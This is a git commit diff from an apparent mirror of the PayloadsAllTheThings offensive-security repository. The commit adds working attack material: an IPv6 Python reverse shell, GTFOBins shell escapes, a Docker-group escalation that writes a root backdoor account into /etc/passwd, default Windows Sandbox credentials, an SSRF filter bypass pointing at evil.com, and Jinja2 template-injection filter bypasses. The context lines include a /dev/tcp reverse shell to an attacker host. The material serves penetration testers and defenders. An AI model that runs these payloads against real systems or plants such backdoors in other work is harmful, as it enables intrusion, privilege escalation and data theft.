mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Shell IPv6 + Sandbox credential
This commit is contained in:
parent
8b39647de6
commit
2e3aef1a19
1
.gitignore
vendored
1
.gitignore
vendored
@ -1,3 +1,4 @@
|
|||||||
BuildPDF/
|
BuildPDF/
|
||||||
.vscode
|
.vscode
|
||||||
.todo
|
.todo
|
||||||
|
AWS Amazon Lambda/
|
@ -39,6 +39,7 @@
|
|||||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||||
./bloodhound
|
./bloodhound
|
||||||
SharpHound.exe (from resources/Ingestor)
|
SharpHound.exe (from resources/Ingestor)
|
||||||
|
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
|
||||||
or
|
or
|
||||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||||
```
|
```
|
||||||
|
@ -8,6 +8,7 @@
|
|||||||
```
|
```
|
||||||
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
||||||
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
|
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
|
||||||
|
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
|
||||||
|
|
||||||
## Checklists
|
## Checklists
|
||||||
|
|
||||||
@ -82,6 +83,28 @@
|
|||||||
* Checks to see if the host has Docker installed
|
* Checks to see if the host has Docker installed
|
||||||
* Checks to determine if we're in an LXC container
|
* Checks to determine if we're in an LXC container
|
||||||
|
|
||||||
|
## GTFOBins
|
||||||
|
|
||||||
|
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
||||||
|
|
||||||
|
The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
|
||||||
|
|
||||||
|
> gdb -nx -ex '!sh' -ex quit
|
||||||
|
> sudo mysql -e '\! /bin/sh'
|
||||||
|
> strace -o /dev/null /bin/sh
|
||||||
|
|
||||||
|
## Groups
|
||||||
|
|
||||||
|
### Docker
|
||||||
|
|
||||||
|
Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$> docker run -it --rm -v $PWD:/mnt bash
|
||||||
|
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- []()
|
- []()
|
@ -36,10 +36,16 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
|
|||||||
|
|
||||||
Linux only
|
Linux only
|
||||||
|
|
||||||
|
IPv4
|
||||||
```python
|
```python
|
||||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
IPv6
|
||||||
|
```python
|
||||||
|
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
|
||||||
|
```
|
||||||
|
|
||||||
```python
|
```python
|
||||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||||
```
|
```
|
||||||
|
@ -6,6 +6,7 @@
|
|||||||
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
||||||
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
||||||
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
||||||
|
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
|
||||||
|
|
||||||
## Windows Version and Configuration
|
## Windows Version and Configuration
|
||||||
|
|
||||||
|
@ -23,6 +23,17 @@ Username: RetailAdmin
|
|||||||
Password: trs10
|
Password: trs10
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
|
||||||
|
|
||||||
|
Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
\\windowssandbox
|
||||||
|
Username: wdagutilityaccount
|
||||||
|
Password: pw123
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Metasploit - SMB
|
## Metasploit - SMB
|
||||||
|
|
||||||
```c
|
```c
|
||||||
|
@ -159,6 +159,12 @@ List:
|
|||||||
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass filter_var() php function
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
0://evil.com:80;http://google.com:80/
|
||||||
|
```
|
||||||
|
|
||||||
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -1,6 +1,42 @@
|
|||||||
# Templates Injections
|
# Templates Injections
|
||||||
|
|
||||||
> Template injection allows an attacker to include template code into an existant (or not) template.
|
> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Methodology](#methodology)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [List files and directories](#list-files-and-directories)
|
||||||
|
* [Java](#java)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [Twig](#twig)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Code execution](#code-execution)
|
||||||
|
* [Smarty](#smarty)
|
||||||
|
* [Freemarker](#freemarker)
|
||||||
|
* [Jade / Codepen](#jade---codepen)
|
||||||
|
* [Velocity](#velocity)
|
||||||
|
* [Mako](#mako)
|
||||||
|
* [Jinja2](#jinja2)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Dump all used classes](#dump-all-used-classes)
|
||||||
|
* [Dump all config variables](#dump-all-config-variables)
|
||||||
|
* [Read remote file](#read-remote-file)
|
||||||
|
* [Write into remote file](#write-into-remote-file)
|
||||||
|
* [Remote Code Execution](#remote-code-execution)
|
||||||
|
* [Filter bypass](filter-bypass)
|
||||||
|
* [Jinjava](#jinjava)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Command execution](#command-execution)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||||
e.g:
|
e.g:
|
||||||
@ -37,7 +73,7 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
|
|||||||
|
|
||||||
## Java
|
## Java
|
||||||
|
|
||||||
### Java - Basic injection
|
### Basic injection
|
||||||
|
|
||||||
```java
|
```java
|
||||||
${7*7}
|
${7*7}
|
||||||
@ -47,13 +83,13 @@ ${class.getResource("").getPath()}
|
|||||||
${class.getResource("../../../../../index.htm").getContent()}
|
${class.getResource("../../../../../index.htm").getContent()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Java - Retrieve the system’s environment variables
|
### Retrieve the system’s environment variables
|
||||||
|
|
||||||
```java
|
```java
|
||||||
${T(java.lang.System).getenv()}
|
${T(java.lang.System).getenv()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Java - Retrieve /etc/passwd
|
### Retrieve /etc/passwd
|
||||||
|
|
||||||
```java
|
```java
|
||||||
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
@ -63,14 +99,14 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
|
|||||||
|
|
||||||
## Twig
|
## Twig
|
||||||
|
|
||||||
### Twig - Basic injection
|
### Basic injection
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{7*7}}
|
{{7*7}}
|
||||||
{{7*'7'}} would result in 49
|
{{7*'7'}} would result in 49
|
||||||
```
|
```
|
||||||
|
|
||||||
### Twig - Template format
|
### Template format
|
||||||
|
|
||||||
```python
|
```python
|
||||||
$output = $twig > render (
|
$output = $twig > render (
|
||||||
@ -84,7 +120,7 @@ $output = $twig > render (
|
|||||||
);
|
);
|
||||||
```
|
```
|
||||||
|
|
||||||
### Twig - Code execution
|
### Code execution
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{self}}
|
{{self}}
|
||||||
@ -145,7 +181,7 @@ ${x}
|
|||||||
[Official website](http://jinja.pocoo.org/)
|
[Official website](http://jinja.pocoo.org/)
|
||||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||||
|
|
||||||
### Jinja2 - Basic injection
|
### Basic injection
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{4*4}}[[5*5]]
|
{{4*4}}[[5*5]]
|
||||||
@ -155,7 +191,7 @@ ${x}
|
|||||||
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||||
The above injections have been tested on Flask application.
|
The above injections have been tested on Flask application.
|
||||||
|
|
||||||
### Jinja2 - Template format
|
### Template format
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{% extends "layout.html" %}
|
{% extends "layout.html" %}
|
||||||
@ -169,7 +205,7 @@ The above injections have been tested on Flask application.
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Dump all used classes
|
### Dump all used classes
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{ [].class.base.subclasses() }}
|
{{ [].class.base.subclasses() }}
|
||||||
@ -177,7 +213,7 @@ The above injections have been tested on Flask application.
|
|||||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Dump all config variables
|
### Dump all config variables
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{% for key, value in config.iteritems() %}
|
{% for key, value in config.iteritems() %}
|
||||||
@ -186,20 +222,20 @@ The above injections have been tested on Flask application.
|
|||||||
{% endfor %}
|
{% endfor %}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Read remote file
|
### Read remote file
|
||||||
|
|
||||||
```python
|
```python
|
||||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Write into remote file
|
### Write into remote file
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Jinja2 - Remote Code Execution via reverse shell
|
### Remote Code Execution
|
||||||
|
|
||||||
Listen for connexion
|
Listen for connexion
|
||||||
|
|
||||||
@ -215,10 +251,42 @@ Inject this template
|
|||||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Filter bypass
|
||||||
|
|
||||||
|
```python
|
||||||
|
request.__class__
|
||||||
|
request["__class__"]
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `_`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
|
||||||
|
|
||||||
|
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||||
|
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||||
|
{{request|attr(["__","class","__"]|join)}}
|
||||||
|
{{request|attr("__class__")}}
|
||||||
|
{{request.__class__}}
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `[` and `]`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
|
||||||
|
or
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `|join`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
||||||
|
```
|
||||||
|
|
||||||
## Jinjava
|
## Jinjava
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
### Jinjava - Basic injection
|
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{'a'.toUpperCase()}} would result in 'A'
|
{{'a'.toUpperCase()}} would result in 'A'
|
||||||
@ -227,7 +295,7 @@ Inject this template
|
|||||||
|
|
||||||
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
|
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
|
||||||
|
|
||||||
### Jinjava - Command execution
|
### Command execution
|
||||||
|
|
||||||
Fixed by https://github.com/HubSpot/jinjava/pull/230
|
Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
|
|
||||||
@ -242,20 +310,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Client Side Template Injection
|
|
||||||
|
|
||||||
### AngularJS
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
$eval('1+1')
|
|
||||||
{{1+1}}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Vue JS
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
{{constructor.constructor('alert(1)')()}}
|
|
||||||
```
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
@ -268,3 +322,6 @@ $eval('1+1')
|
|||||||
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
||||||
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
||||||
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
||||||
|
* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
||||||
|
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
|
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
@ -1,5 +1,7 @@
|
|||||||
# XSS in Angular
|
# XSS in Angular
|
||||||
|
|
||||||
|
The following payloads are based on Client Side Template Injection.
|
||||||
|
|
||||||
## Stored/Reflected XSS - Simple alert
|
## Stored/Reflected XSS - Simple alert
|
||||||
|
|
||||||
> Angular as of version 1.6 have removed the sandbox altogether
|
> Angular as of version 1.6 have removed the sandbox altogether
|
||||||
|
Loading…
Reference in New Issue
Block a user